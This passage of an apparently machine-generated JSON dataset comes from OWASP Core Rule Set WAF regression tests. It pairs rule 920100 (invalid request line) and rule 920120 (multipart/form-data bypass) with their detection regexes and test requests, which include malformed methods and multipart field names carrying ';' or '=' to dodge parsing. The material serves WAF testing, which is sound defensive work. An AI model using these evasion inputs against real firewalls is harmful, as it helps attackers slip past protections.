"request": { "method": "GET", "uri": "/get/index.html?I=Like&Apples=Today#tag", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920100 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "I=Like&Apples=Today#tag" } ] }, { "description": "The colon in the path is not allowed. Apache will block by default:\n(20024)The given path is misformatted or contained invalid characters: [client 127.0.0.1:4142] AH00127: Cannot map GET /index.html:80?I=Like&Apples=Today#tag HTTP/1.1 to file\n", "test_id": 8, "request": { "method": "GET", "uri": "/get/index.html:80?I=Like&Apples=Today#tag", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [] }, "malicious_patterns": [ { "location": "uri_params", "value": "I=Like&Apples=Today#tag" } ] }, { "description": "Normal Options request with path", "test_id": 9, "request": { "method": "OPTIONS", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920100 ] }, "malicious_patterns": [] }, { "description": "An invalid method with a long name", "test_id": 10, "request": { "method": "REALLYLONGUNREALMETHOD", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920100 ] }, "malicious_patterns": [] }, { "description": "An invalid request because a backslash is used in URI.\nApache will end up blocking this before it gets to CRS.\nWe will need to support OR output tests to fix this.\n", "test_id": 11, "request": { "method": null, "uri": "\\", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [] }, "malicious_patterns": [] }, { "description": "Invalid HTTP Request Line (920100) - Test 1 from old modsec regressions", "test_id": 12, "request": { "method": "\tGET", "uri": "/get", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [] }, "malicious_patterns": [] }, { "description": "Invalid HTTP Request Line (920100) - Test 2 from old modsec regressions", "test_id": 13, "request": { "method": "GET", "uri": "\\index.html", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [] }, "malicious_patterns": [] }, { "description": "Invalid HTTP Request Line (920100) - Test 3 from old modsec regressions", "test_id": 14, "request": { "method": "|GET", "uri": "/get", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920100 ] }, "malicious_patterns": [] }, { "description": "Test as described in http://www.client9.com/article/five-interesting-injection-attacks/", "test_id": 15, "request": { "method": "GET", "uri": "/get/demo/xss/xml/vuln.xml.php?input=&//", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [] }, "malicious_patterns": [ { "location": "uri_params", "value": "input=&//" } ] }, { "description": "Status Page Test - Invalid HTTP request line: URI has scheme and authority but no path", "test_id": 16, "request": { "method": "GET", "uri": "http://localhost", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920100 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 53, "variables": [ { "variable": "REQUEST_LINE", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)^(?:get /[^#\\?]*(?:\\?[^\\s\\x0b#]*)?(?:#[^\\s\\x0b]*)?|(?:connect (?:(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\\.?(?::[0-9]+)?|[\\--9A-Z_a-z]+:[0-9]+)|options \\*|[a-z]{3,10}[\\s\\x0b]+(?:[0-9A-Z_a-z]{3,7}?://[\\--9A-Z_a-z]*(?::[0-9]+)?)?/[^#\\?]*(?:\\?[^\\s\\x0b#]*)?(?:#[^\\s\\x0b]*)?)[\\s\\x0b]+[\\.-9A-Z_a-z]+)$", "actions": [ { "act_name": "id", "lineno": 54, "act_quote": "no_quote", "act_arg": "920100", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 55, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 56, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 57, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 58, "act_quote": "quotes", "act_arg": "Invalid HTTP Request Line", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 59, "act_quote": "quotes", "act_arg": "%{request_line}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 60, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 61, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 62, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 63, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 64, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 65, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 66, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 67, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 68, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 69, "act_quote": "quotes", "act_arg": "WARNING", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 70, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": true, "oplineno": 53 } }, { "rule_id": "920120", "has_tests": true, "detection": { "variables": [ { "name": "FILES", "part": "", "negated": false }, { "name": "FILES_NAMES", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)^(?:&(?:(?:[acegilnorsuz]acut|[aeiou]grav|[aino]tild)e|[c-elnr-tz]caron|(?:[cgklnr-t]cedi|[aeiouy]um)l|[aceg-josuwy]circ|[au]ring|a(?:mp|pos)|nbsp|oslash);|[^\\\"';=\\x5c])*$", "negated": true } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Attempted multipart/form-data bypass", "logdata": "%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language": "en", "Connection": "close", "Referer": "http://localhost/", "Content-Type": "multipart/form-data; boundary=--------397236876" }, "data": "----------397236876\nContent-Disposition: form-data; name=\"fileRap\"; filename=\"file=.txt\"\nContent-Type: text/plain\n\n555-555-0199@example.com\n----------397236876--\n" }, "expected": { "should_block": true, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "----------397236876\nContent-Disposition: form-data; name=\"fileRap\"; filename=\"file=.txt\"\nContent-Type: text/plain\n\n555-555-0199@example.com\n----------397236876--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120) from old modsec regressions", "test_id": 2, "request": { "method": "POST", "uri": "/cgi-bin/fup.cgi", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-us,en;q=0.5", "Connection": "keep-alive", "Content-Type": "multipart/form-data; boundary=---------------------------627652292512397580456702590", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "Referer": "http", "User-Agent": "OWASP CRS test agent" }, "data": "-----------------------------627652292512397580456702590\nContent-Disposition: form-data; name=\"fi=le\"; filename=\"test\"\nContent-Type: text/plain\n\nemail: security@example.com\n\n-----------------------------627652292512397580456702590\nContent-Disposition: form-data; name=\"note\"\n\nContact info.\n-----------------------------627652292512397580456702590--\n" }, "expected": { "should_block": true, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------627652292512397580456702590\nContent-Disposition: form-data; name=\"fi=le\"; filename=\"test\"\nContent-Type: text/plain\n\nemail: security@example.com\n\n-----------------------------627652292512397580456702590\nContent-Disposition: form-data; name=\"note\"\n\nContact info.\n-----------------------------627652292512397580456702590--\n" } ] }, { "description": "Invalid Request Body (920120) from old modsec regressions", "test_id": 3, "request": { "method": "POST", "uri": "/", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "Referer": "http", "User-Agent": "OWASP CRS test agent" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"fi;le\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nRotem & Ayala\n\n-----------------------------265001916915724\nContent-Disposition: form-data; name=\"name\"\n\ntt2\n-----------------------------265001916915724\nContent-Disposition: form-data; name=\"B1\"\n\nSubmit\n-----------------------------265001916915724--\n" }, "expected": { "should_block": true, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"fi;le\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nRotem & Ayala\n\n-----------------------------265001916915724\nContent-Disposition: form-data; name=\"name\"\n\ntt2\n-----------------------------265001916915724\nContent-Disposition: form-data; name=\"B1\"\n\nSubmit\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120). Negative test.", "test_id": 4, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"file\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": false, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"file\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120).", "test_id": 5, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\";zzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": true, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\";zzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120).", "test_id": 6, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"amp;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": true, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"amp;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120).", "test_id": 7, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"mp;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": true, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"mp;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120).", "test_id": 8, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"p;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": true, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"p;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120).", "test_id": 9, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"Zamp;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": true, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"Zamp;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120).", "test_id": 10, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"Zmp;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": true, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"Zmp;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120).", "test_id": 11, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"Zp;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": true, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"Zp;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120).", "test_id": 12, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"Z;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": true, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"Z;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120).", "test_id": 13, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"ZZZamp;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": true, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"ZZZamp;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120).", "test_id": 14, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"ZZZmp;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": true, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"ZZZmp;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120).", "test_id": 15, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"ZZZp;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": true, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"ZZZp;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120).", "test_id": 16, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"ZZZ;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": true, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"ZZZ;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120).", "test_id": 17, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"mZ;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": true, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"mZ;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeiouy]uml;.", "test_id": 18, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"zzzäëïöüÿÄËÏÖÜŸzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": false, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"zzzäëïöüÿÄËÏÖÜŸzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[aeiouy]uml;", "test_id": 19, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"äëïöüÿÄËÏÖÜŸzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": false, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"äëïöüÿÄËÏÖÜŸzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeioucghjswy]circ;.", "test_id": 20, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"zzzâêîôûĉĝĥĵŝŵŷÂÊÎÔÛĈĜĤĴŜŴŶzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": false, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"zzzâêîôûĉĝĥĵŝŵŷÂÊÎÔÛĈĜĤĴŜŴŶzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[aeioucghjswy]circ;", "test_id": 21, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"âêîôûĉĝĥĵŝŵŷÂÊÎÔÛĈĜĤĴŜŴŶzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": false, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"âêîôûĉĝĥĵŝŵŷÂÊÎÔÛĈĜĤĴŜŴŶzzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeiouclnrszg]acute;.", "test_id": 22, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"zzzáéíóúćĺńŕśźǵÁÉÍÓÚĆĹŃŔŚŹ&Gacute;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" }, "expected": { "should_block": false, "rule_ids": [ 920120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "-----------------------------265001916915724\nContent-Disposition: form-data; name=\"zzzáéíóúćĺńŕśźǵÁÉÍÓÚĆĹŃŔŚŹ&Gacute;zzz\"; filename=\"test\"\nContent-Type: application/octet-stream\n\nhelloworld\n-----------------------------265001916915724--\n" } ] }, { "description": "Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[aeiouclnrszg]acute;", "test_id": 23, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=---------------------------265001916915724", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "-----------------------------265001916915724\nContent-Disposition: form-data; 